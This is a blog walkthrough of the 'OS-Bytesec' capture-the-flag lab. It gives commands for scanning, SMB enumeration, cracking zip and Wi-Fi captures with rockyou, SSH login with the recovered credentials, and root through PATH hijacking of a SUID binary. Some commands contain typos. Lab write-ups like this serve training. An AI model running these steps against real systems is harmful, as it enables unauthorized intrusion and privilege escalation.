OS-Bytesec walkthrough

OS-Bytesec download here OS-Bytesec walkthrough

In this Blog, we slove OS-Bytesec walkthrough This lab is designed by Rahul Gehlaut

Network Scanning: I use Netdiscover is simple ARP Scanner to scan for live hosts in a network.

netdiscover

As you can see from the image our VM IP is 192.168.1.40 Now we can be scanning our VM IP with Nmap.

Now let’s see the services running on the remote machine with the help of the Nmap tool by performing an aggressive scan on all the ports of the remote machine

nmap -A 192.168.1.40

As can be seen, there are only three port is open port: 80,139,445,2525

As port 80 is open, let us try and open the IP in the browser as shown in the image below

I did a basic enumeration with I see Web page source code and we see the bottom page ####GET####SMB####Fee

Now enumeration SMB with enum4linux

enum4linux -A 192.168.1.40

And I found after enumerate 3 SMB user Sagar, blackjax, smb, after trying login attempt I see smb user without password login.

login with SMB smbclient //192.168.1.40/smb -U smb -p and Enter twice I login into SMB

smbclient //192.168.1.40/smb -U smb -p

And we see after login smb found 2 file main.txt, safe.zip now download the file our local system with get command

get safe.zip

And after download all files we see safe.zip file is locked now cracking safe file with fcrackzip toll Dictionary Attack with file rockyou.txt

fcrakzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

And I found safe.zip file password

Password: hacker1

Now unzip our safe file with password hacker1

unzip safe.zip

After unzipping safe file we 2 file secret.jpg, user.cap

Cracking user.cap file with aircrack-ng

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

After crack cap file found an ssh username: blackjax and password: snowflake

username: blackjax
password: snowflake

Login with ssh username blackjax and password snowflake

And Found a our first flag blackjax user home directory

cat user.txt

Privilege Escalation

find / -type f -perm -u=s 2>/dev/null

Again, after some basic enumeration checks(SUID, GUID, Kernel exploits, etc), I saw that the /usr/bin/netscan application had the permission to be executed as SUDO without the SUDO password:

and I run the script

/usr/bin/netscan

after running the script I see the script working background netstat command

Privilege Escalation netscan PATH Variable I go to /tmp directory and run the command

$PATH 
ct /tmp
echo "/bin/bash" > netstat
export PATH=/tmp:$PATH

and run the script Again

/usr/bin/netscan

and I got root shell check with id command

id
cd /root

and I go to root folder and run cat root.txt

We got the final root flag.

Author: Rahul Gehlaut

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →